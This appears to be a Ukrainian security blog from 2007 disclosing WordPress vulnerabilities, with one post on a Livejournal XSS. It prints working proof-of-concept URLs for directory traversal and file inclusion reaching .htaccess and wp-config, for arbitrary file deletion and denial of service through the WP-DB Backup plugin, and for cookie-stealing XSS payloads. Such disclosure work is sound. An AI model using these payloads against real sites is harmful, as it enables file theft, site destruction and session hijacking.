Websecurity - Веб безпека

В цьому місяці я багато писав про уразливості в WordPress. Як про уразливості, що були виявлені в Вордпресі різними секюріті дослідниками, так і про уразливості знайдені мною в движку в цьому році. А також оприлюднив уразливості в одному плагіні для WP.

І сьогодні я вирішив провести новий цікавий проект - День багів в WordPress (Day of bugs in WordPress). Сьогодні я опублікую ще чималу кількість уразливостей, котрі я знайшов в WP в цьому році.

Серед виявлених мною уразливостей в движку, що я вже оприлюднив в грудні, були наступні:

• Information disclosure уразливості в WordPress (деталі)
• XSS уразливості в WordPress 2.0.x (деталі)
• Cross-Site Scripting в WordPress 2.0.x (деталі)
• XSS уразливості в WordPress 2.0.x (деталі)
• Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress (деталі)
• Local file include, Directory traversal та Full path disclosure в WordPress (деталі)
• Нові Local file include, Directory traversal та Full path disclosure в WordPress (деталі)

В жовтні, 31.10.2007 (в edit.php), і в листопаді, 29.11.2007 (в admin.php), я знайшов нові Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах edit.php та admin.php в параметрі page.

Full path disclosure:

http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

В червні, 09.06.2007 (в admin.php) і 15.06.2007 (в themes.php), я знайшов Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлах admin.php (параметр import) та themes.php (параметр page).

Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=

Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше.

Local file include та Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess

В файлі admin.php через параметр import можна лише підключити файли з php розширенням.

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

В червні, 05.06.2007, я знайшов Directory traversal, Arbitrary file deletion та Denial of Service уразливості в WordPress. А 28.10.2007 ще додатково Cross-Site Scripting уразливість. Дірки в файлі wp-db-backup.php - в плагіні WordPress Database Backup.

В минулому році була знайдена Directory traversal уразливість в плагіні WordPress WP-DB Backup. Котра була виправлена в WP 2.0.4.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Як я виявив даний плагін також вразливий до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше стосовно іншої дірки в цьому движку - Local file include та Directory traversal в WordPress.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Ця дірка також вже була виправлена в WP 2.0.4. Тому вразлива WordPress 2.0.3 і попередні версії. Окрім Directory traversal, я ще виявив інші уразливості.

Також можливо видалити довільний файл на сервері (на котрий має права даний користувач). Тому що плагін WordPress Database Backup видаляє файли, до котрих відбувається запит - причому незалежно від того, чи скачає користувач файл, чи ні, в будь-якому випадку файл видаляється.

Arbitrary file deletion:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Це також може бути використано для проведення DoS-атаки. При видаленні index.php сайт перестане нормально функціонувати.

DoS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

Вразлива WordPress 2.0.3 і попередні версії.

XSS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).

Нещодавно мені повідомив читач мого сайту про Cross-Site Scripting уразливість на популярному блог сервіс Livejournal.com. Як я вчора перевірив, уразливість мала місце. На сайті LJ на сторінці update.bml була reflected та DOM based XSS в параметрі usejournal.

XSS:

http://www.livejournal.com/update.bml?usejournal=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Коли я сьогодні вирішив написати про це, вияснилось, що власники Livejournal вже виправили цю дірку (їм явно про неї повідомили). Але я швиденько знайшов дві нові XSS , про які повідомлю найближчим часом.

Також сайт вразливий до Expect HTML Injection і ця дірка досі не виправлена. Так що власникам Livejournal потрібно краще слідкувати за безпекою власного сервісу.

Ще в січні були оприлюднені DoS (віддалений і локальний) та File Disclosure уразливості в WordPress. Вразливі версії WordPress до 2.1.

• Multiple Remote Vulnerabilities in Wordpress (деталі)

Denial of Service та File Disclosure дірки наявні в XMLRPC та Pingback реалізаціях в движку. Дані уразливості були виправлені в нових версіях WP.

Нещодавно, 18.12.2007, я знайшов нові Cross-Site Scripting уразливості в WordPress. Дірки в файлах theme-editor.php, themes.php та profile-update.php. Вразливі WordPress 2.0.7 і попередні версії.

XSS:

http://site/wp-admin/theme-editor.php?file=wp-content/themes/default/style.css&theme=WordPress+Default&action=update&xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&stylesheet=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&template=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://sites/wp-admin/themes.php?action=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/profile-update.php?xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В кінці минулого року я писав про подібні уразливості в WordPress. Тому дані уразливості - це доповнення до раніше знайдених мною дір в WP 2.0.x. У версії WordPress 2.0.9 вони вже виправлені.

Сьогодні вийшла нова версія програми Perl Pas Interpreter v.1.3.6. В новій версії:

• Додана функція inc.
• Додана функція dec.
• Покращена підтримка арифметичних виразів в операторі while.
• Покращена робота оператора div та функції random з масивами (з індексом-змінною).

Деталі на сайті інтерпретатора. Тема для обговорення програми на форумі.

Додаткова інформація про Perl Pas Interpreter в розділі Онлайн інструменти.

Ще в минулому році були оприлюднені SQL Error та Full path disclosure уразливості в WordPress. Вразлива версія WordPress 2.0.3.

• WordPress 2.0.3 SQL Error and Full Path Disclosure (деталі)

Дана SQL Error була виправлена в нових версіях WP. А ось зазначені Full path disclosure (49 дірок), як я вже писав, так і не були виправлені навіть в самій останній версії WP.

В листопаді, 06.11.2007, я знайшов дві Cross-Site Scripting уразливості в WordPress. Дірки в файлах post.php та page-new.php в параметрі popuptitle (вразливий код знаходиться в трьох інших файлах, що завантажуються даними скриптами).

XSS:

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

Це приклади для Internet Explorer. Для виконання коду в Mozilla та Firefox може бути використаний “-moz-binding”.

Вразливі версії WordPress <= 2.0.9. Версія WP 2.0.11 не вразлива.